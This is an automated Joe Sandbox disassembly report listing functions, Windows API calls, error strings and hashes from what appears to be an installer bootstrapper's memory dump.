Opcode Fuzzy Hash: 09fb0bf70477103967594cf31249025bd4a33def78c2c2817d7abeb02aea4dee
Instruction Fuzzy Hash: 02F0307161120CBBEB00DBA8DD05EFBB7B8DB08710F410066EA01F7150DA71AA0496B2

Function 000AF086 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 000AF09B
GetLastError.KERNEL32 ref: 000AF0A5

Strings

Failed to post plan message., xrefs: 000AF0D3
EngineForApplication.cpp, xrefs: 000AF0C9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post plan message.
API String ID: 2609174426-2952114608
Opcode ID: 47e2483238be0605190b6217ae78bf0da8fbd40c6f4ceefc616cc9416b3c5c50
Instruction ID: 252fec86baaafd7da90012ef4321be9daceb5081740ea916084f728a574a2143
Opcode Fuzzy Hash: 47e2483238be0605190b6217ae78bf0da8fbd40c6f4ceefc616cc9416b3c5c50
Instruction Fuzzy Hash: 09F0A732745330BBE72126AA9C05E877BC4DF04BA0F024026FE0CEA191D6158C0095F4

Function 000AF194 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 000AF1A9
GetLastError.KERNEL32 ref: 000AF1B3

Strings

Failed to post shutdown message., xrefs: 000AF1E1
EngineForApplication.cpp, xrefs: 000AF1D7

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post shutdown message.
API String ID: 2609174426-188808143
Opcode ID: 2d38a58c2c295021ac00738405b73929f148f361319f023d46c4c14864d7a2f2
Instruction ID: 81bf2d1b0a360d0ea04b97726e820150e30d6edf241fd809500687b2e705b82c
Opcode Fuzzy Hash: 2d38a58c2c295021ac00738405b73929f148f361319f023d46c4c14864d7a2f2
Instruction Fuzzy Hash: 7CF0A736B45330BFE7206AAA9C09E977BC4EF04B60F024026BE18FA191D6558D0096F4

Function 000B051A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(000DB468,00000000,?,000B145A,?,00000000,?,0009C121,?,000952FD,?,000A73B2,?,?,000952FD,?), ref: 000B0524
GetLastError.KERNEL32(?,000B145A,?,00000000,?,0009C121,?,000952FD,?,000A73B2,?,?,000952FD,?,0009533D,00000001), ref: 000B052E

Strings

Failed to set begin operation event., xrefs: 000B055C
cabextract.cpp, xrefs: 000B0552

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: cc48d8009e05d7cb9a5457f1b7102e6f9904a6fe04f23c37f0b843c62b326579
Instruction ID: 6a43ded32d686ead63f9610163d5516618c41de9a13de6c6ee1f9950930bb73c
Opcode Fuzzy Hash: cc48d8009e05d7cb9a5457f1b7102e6f9904a6fe04f23c37f0b843c62b326579
Instruction Fuzzy Hash: 44F0EC33B05730ABE72066BA6C05BDB77D8DF09760B020126FD09F7551E6159D0056F9

Function 000AE978 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 000AE98D
GetLastError.KERNEL32 ref: 000AE997

Strings

Failed to post apply message., xrefs: 000AE9C5
EngineForApplication.cpp, xrefs: 000AE9BB

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post apply message.
API String ID: 2609174426-1304321051
Opcode ID: 4a2166fa5429ebf0cf476af2e6488b7f2d1025e98119acfb037a8a6f8d0fe543
Instruction ID: 89baa283426e9877014eec14cf9c1f82eb1750683772edb9e6924f2471891fb3
Opcode Fuzzy Hash: 4a2166fa5429ebf0cf476af2e6488b7f2d1025e98119acfb037a8a6f8d0fe543
Instruction Fuzzy Hash: A0F0A7327453306BE72126AA9C05E877BC8DF04BA0F020026BE08FA191D6258D0096F5

Function 000AEA09 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 000AEA1E
GetLastError.KERNEL32 ref: 000AEA28

Strings

Failed to post detect message., xrefs: 000AEA56
EngineForApplication.cpp, xrefs: 000AEA4C

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post detect message.
API String ID: 2609174426-598219917
Opcode ID: 12ed9eecf63106538805697e8c9f0a67680b9d4707f1dacd35a1c71675849725
Instruction ID: e1746b7a04d78248a79179d3329b31a06d7baf2a2b1240878693ffa8211d8961
Opcode Fuzzy Hash: 12ed9eecf63106538805697e8c9f0a67680b9d4707f1dacd35a1c71675849725
Instruction Fuzzy Hash: 2BF0A732B453306FE72066AA9C05F877BC4EF05BA0F024116FE08EA191D6159D00D6F5

Function 000C90AA Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,E3E85006,000C234D,00000000,00000000,000C3382,?,000C3382,?,00000001,000C234D,E3E85006,00000001,000C3382,000C3382), ref: 000C90F7
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000C9180
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000C9192
__freea.LIBCMT ref: 000C919B

Part of subcall function 000C5154: HeapAlloc.KERNEL32(00000000,?,?,?,000C1E90,?,0000015D,?,?,?,?,000C32E9,000000FF,00000000,?,?), ref: 000C5186

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID:
API String ID: 573072132-0
Opcode ID: ad03c67dfe5d6380798aaf22e684299b2b4a54be836690f1d53abfde06e471a3
Instruction ID: e5bc769984e154eb9380712d0502e658f0e04351324debfaa39a9ae711550fbb
Opcode Fuzzy Hash: ad03c67dfe5d6380798aaf22e684299b2b4a54be836690f1d53abfde06e471a3
Instruction Fuzzy Hash: F331DE72A0020AABDF249F65CC4AEEE7BA5EF41310B09412DFC14D7251EB35DD54CBA0

Function 00094E9C Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00000000,?,0009545F,?,?,?,?,?,?), ref: 00094EF6
DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,0009545F,?,?,?,?,?,?), ref: 00094F0A
TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0009545F,?,?), ref: 00094FF9
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0009545F,?,?), ref: 00095000

Part of subcall function 00091160: LocalFree.KERNEL32(?,?,00094EB3,?,00000000,?,0009545F,?,?,?,?,?,?), ref: 0009116A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalDeleteFreeSection$CloseHandleLocal
String ID:
API String ID: 3671900028-0
Opcode ID: a8835b27ea0551f2b69a22e4398b7223ccff4aac8f1d98472ef7d5597d6e129e
Instruction ID: f0351a84e090723a7f6cbc54e6654e0076879d4eb3b610277520c785d3bfd7cb
Opcode Fuzzy Hash: a8835b27ea0551f2b69a22e4398b7223ccff4aac8f1d98472ef7d5597d6e129e
Instruction Fuzzy Hash: 0C41A8B1500B05ABDE60FBB4C88AFDBB3ECAF04345F44082AB69AD3152EB34E5459725

Function 000D3119 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 000D312C
VariantInit.OLEAUT32(?), ref: 000D3138
VariantClear.OLEAUT32(?), ref: 000D31AC
SysFreeString.OLEAUT32(00000000), ref: 000D31B7

Part of subcall function 000D336E: SysAllocString.OLEAUT32(?), ref: 000D3383

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$AllocVariant$ClearFreeInit
String ID:
API String ID: 347726874-0
Opcode ID: 8c44bf41499cb52ce65d64bfe2787e1e0fa89d471d88c369149c3c86388cdbe0
Instruction ID: 28e25cb881f6d78e2aec9878b34b21680692cdb0db10dbb0e7de7f471a26e53e
Opcode Fuzzy Hash: 8c44bf41499cb52ce65d64bfe2787e1e0fa89d471d88c369149c3c86388cdbe0
Instruction Fuzzy Hash: 3B213A3590121AFFCB24DFA5C848EAEBBF8BF45711F15015EE9019B220DB319E05CBA1

Function 00094B80 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0009F7F7: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00094B9F,?,?,00000001), ref: 0009F847

CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00094C06

Part of subcall function 000D082D: CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 000D089A
Part of subcall function 000D082D: GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 000D08A4
Part of subcall function 000D082D: CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 000D08ED
Part of subcall function 000D082D: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 000D08FA

Strings

Unable to get resume command line from the registry, xrefs: 00094BA5
Failed to get current process path., xrefs: 00094BC4
Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00094BF0

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Close$Handle$CreateErrorLastProcess
String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
API String ID: 1572399834-642631345
Opcode ID: 707e002ca478dfd22885479501858fd8e4484192bfe3564ac9bef951bb9865e1
Instruction ID: 39a0d78407188c07219c0ab123364095f3b3b4bac47fcfb2910a47b72f7191b6
Opcode Fuzzy Hash: 707e002ca478dfd22885479501858fd8e4484192bfe3564ac9bef951bb9865e1
Instruction Fuzzy Hash: 29117C76D01618FB8F22AB98DD01DEEFBF8EF44711F1041A7FD04A6211DB318A41ABA1

Function 000C8731 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000C88D5,00000000,00000000,?,000C86D8,000C88D5,00000000,00000000,00000000,?,000C88D5,00000006,FlsSetValue), ref: 000C8763
GetLastError.KERNEL32(?,000C86D8,000C88D5,00000000,00000000,00000000,?,000C88D5,00000006,FlsSetValue,000F2208,000F2210,00000000,00000364,?,000C6130), ref: 000C876F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000C86D8,000C88D5,00000000,00000000,00000000,?,000C88D5,00000006,FlsSetValue,000F2208,000F2210,00000000), ref: 000C877D

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 799d76512f5bc8757957adac457fa09859bca160c901229a3ffc7cbe0cf5f581
Instruction ID: ff314759a28d7514d2c15fb195077f9059bebb8cbb750f89baa18f6700fa6a1f
Opcode Fuzzy Hash: 799d76512f5bc8757957adac457fa09859bca160c901229a3ffc7cbe0cf5f581
Instruction Fuzzy Hash: 2A01F73621A2269BD7314B69DC48FAF3798AF05BA17354729F916E3140EB24DC01C7E8

Function 000C605E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,000C19F5,00000000,80004004,?,000C1CF9,00000000,80004004,00000000,00000000), ref: 000C6062
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 000C60CA
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 000C60D6
_abort.LIBCMT ref: 000C60DC

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 30c92929cd79930bddf4267ed58e82124360741807a8b1bb0b77521c7634b591
Instruction ID: 9e14b135323313c36f9416017d1438bd5082058c970e0ea7f02e123a44e4b812
Opcode Fuzzy Hash: 30c92929cd79930bddf4267ed58e82124360741807a8b1bb0b77521c7634b591
Instruction Fuzzy Hash: A4F0F43A100E0066D27233746C0EFAF26DA9BC2B72F39011DFD19B2593FF2598416576

Function 0009730C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00097318
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0009737F

Strings

Failed to get value of variable: %ls, xrefs: 00097352
Failed to get value as numeric for variable: %ls, xrefs: 0009736E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-4270472870
Opcode ID: 9feb8302fa162af877fc52c8d62839ac6fca843a771089e6b95ffd9bc7f2521e
Instruction ID: 0e28a33aac53247cc5314324cacb4fe9a72fce9180d498ea72591cb70223d694
Opcode Fuzzy Hash: 9feb8302fa162af877fc52c8d62839ac6fca843a771089e6b95ffd9bc7f2521e
Instruction Fuzzy Hash: AC017177965229FBCF155F64CC05A9E3B699F04721F01C165FD08AA221C3369F10BBE4

Function 00097481 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0009748D
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 000974F4

Strings

Failed to get value as version for variable: %ls, xrefs: 000974E3
Failed to get value of variable: %ls, xrefs: 000974C7

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-1851729331
Opcode ID: 9506d9f48c09c51f43ad8631448c41fd494853b1a6af4a9bb73f39b66c696f5e
Instruction ID: cb4efb7eb34345661aac89b4a90ff836362856d2ca091f1614f5079118fd748a
Opcode Fuzzy Hash: 9506d9f48c09c51f43ad8631448c41fd494853b1a6af4a9bb73f39b66c696f5e
Instruction Fuzzy Hash: 21018437955229FBCF225F54CC05E9E3F69AF10721F118126FD08AA222C336DE10A7E5

Function 00097410 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00099752,00000000,?,00000000,00000000,00000000,?,00099590,00000000,?,00000000,00000000), ref: 0009741C
LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00099752,00000000,?,00000000,00000000,00000000,?,00099590,00000000,?,00000000), ref: 00097472

Strings

Failed to copy value of variable: %ls, xrefs: 00097461
Failed to get value of variable: %ls, xrefs: 00097442

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2936390398
Opcode ID: 4b3d31dfe20db4237eb512eedcb68081c6a0cf88d0b19322dcb4e92cf7c73c23
Instruction ID: 23846caf845477497d409ce4d28a8d5eb3f68de5eec990067c145250d2b36a48
Opcode Fuzzy Hash: 4b3d31dfe20db4237eb512eedcb68081c6a0cf88d0b19322dcb4e92cf7c73c23
Instruction Fuzzy Hash: 3CF08176950229FBCF126F94CC05E9E7F649F05361F008021FD08AA322D3369A20A7E4

Function 000D88BE Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,Qd,000D5C11,feclient.dll,clbcatq.dll,000DB508,000DB4F0,HEAD,00000000,000DB4D8,Qd,00000000,?,?,00000000), ref: 000D88E8

Strings

feclient.dll, xrefs: 000D88C3
inetutil.cpp, xrefs: 000D8903
Qd, xrefs: 000D88BE

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast
String ID: Qd$feclient.dll$inetutil.cpp
API String ID: 1452528299-1281767629
Opcode ID: d0b3933ede3823b1c59651ec6b766272f36c04ca05bb16169f83a18ee966546d
Instruction ID: 5c028dc744611f34efd3288f43792063402e278345b8bf8db4b42693e446122e
Opcode Fuzzy Hash: d0b3933ede3823b1c59651ec6b766272f36c04ca05bb16169f83a18ee966546d
Instruction Fuzzy Hash: 1DF04FB2601228ABE7109B94CC09BABFBACEB05751F018156BD45E7240EA759A4097F1

Function 000C1246 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 000C1246
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 000C124B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 000C1250

Part of subcall function 000C1548: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 000C1559

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 000C1265

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 294756368ebb91e0d837f8d85631f380e5f2af2aa371e18ba28d844398db2aca
Instruction ID: f386985750ffecf030cf2b58cd022b9525ba3590896ea1fb9359ed55ce3eae7f
Opcode Fuzzy Hash: 294756368ebb91e0d837f8d85631f380e5f2af2aa371e18ba28d844398db2aca
Instruction Fuzzy Hash: 15C0483C00860198AEA03BF52242FED038A0FE3385B9020CEF866A7643AD1A043F3032

Function 000D4661 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 000D47C2

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 000D4672
PendingFileRenameOperations, xrefs: 000D46B2, 000D479A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-3023217399
Opcode ID: eaccab25068e8faaddaf348b64edcf876517aebc26518fdc6f10044663bf4a38
Instruction ID: 7fc6d26ecc49e3a12b1ab8e924171420d35f70ce42da098fab3de25732e57095
Opcode Fuzzy Hash: eaccab25068e8faaddaf348b64edcf876517aebc26518fdc6f10044663bf4a38
Instruction Fuzzy Hash: C6417E75E04319EBCB20EF94C9819AEBBF9EF46B10F21406BE505AB311DB719E50DB60

Function 000D0B49 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 000D0CA0

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

Strings

regutil.cpp, xrefs: 000D0C8D

Memory Dump Source

